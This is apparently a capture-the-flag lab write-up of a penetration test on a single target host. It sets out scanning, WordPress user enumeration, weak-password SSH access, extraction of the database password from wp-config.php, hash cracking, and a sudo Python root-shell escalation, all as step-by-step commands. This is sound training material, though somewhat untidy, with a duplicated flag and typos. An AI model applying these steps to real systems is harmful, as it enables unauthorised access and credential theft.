- Exposed Services
- Critical Vulnerabilities
- Exploitation
- nmap -sS -PO 192.168.1.*
- Name: Target 1
- IP Address: 192.168.1.110
- Nmap scan results for each machine reveal the below services and OS details:
- nmap -sV 192.168.110
-
The scan above identifies the services below as potential points of entry:
- Port 22/TCP Open SSH
- Port 80/TCP Open HTTP
- Port 111/TCP Open rcpbind
- Port 139/TCP Open netbios-ssn
- Port 445/TCP Open netbios-ssn
- The following vulnerabilities were identified on the target Machine:
-
- Wordpress user enumeration;
-
- Weak user password
-
- Able to obtain password for MySQL DB and start a session
-
- Unsalted password hashes able to penetrate target machine and escalate user privilege to root
-
-
Command Used WordPress User Enumeration Scan: wpscan --url http://192.168.1.110/wordpress --enumerate u
-
Vulnerability CVE-2017-5487: Scan enumerates user names and other possibly vulnerable paths and files.
-
Rating Base Score: 5.3 Medium
As can be seen below the scan was successful in enumerating valid usernames of Steven & Michael
(Click On Image/s To Open In Expanded View)
- Weak user passwords made it possible ssh into user shell with Username - Michael (Image Below).
- ssh michael@192.168.1.110
- PW = michael
- ssh michael@192.168.1.110
- After login as Michael was able to traverse through directories and files where and found Flag One & Flag Two (Image/s Below):
- Flag1 = b9bbcb33ellb80be759c4e844862482d
- /var/www/html/service.html
- nano service.html
- Flag2 = fc3fd58dcdad9ab23faca6e9a3e581c
- /var/www/
- ls
- cat flag2.txt
- Flag1 = b9bbcb33ellb80be759c4e844862482d
- Able to find password to MySQL DB in the following direcotry and file (Image Below):
- /var/www/html/wp-config.php
- nano wp-config.php
- MySQL DB PW: R@v3nSecurity
- Command/s Used (See Images Below)
- mysql --user=root --password=R@v3nSecurity
- show database;
- use wordpress;
- show tables;
- select * from wp_users;
- select * from wp_posts;
- Flag3 Found = afc01ab56b50591e7dccf93122770cd2
- Using the commands above was able to find and dump password hash for Steven
- created file on Kali Attack Machine for password hashes
- Command used: touch wp_hashes.txt
- nano wp_hashes.txt and added hashes
- using john the ripper obtained Steven password
- Command: john wp_hashes.txt
- PW = pink84
- created file on Kali Attack Machine for password hashes
- Logged in using Steven credentials
- ssh steven@192.168.1.110
- pw pink84
- escalated to root using: sudo -l
- Using python was able to penetrate target machine
- sudo python -c 'import pty;pty.spawn("/bin/bash")'
- Traversed the direcotry and found Flag 4
- Flag4 715dea6c055b9fe3337544932f2941ce
- cat flag4.txt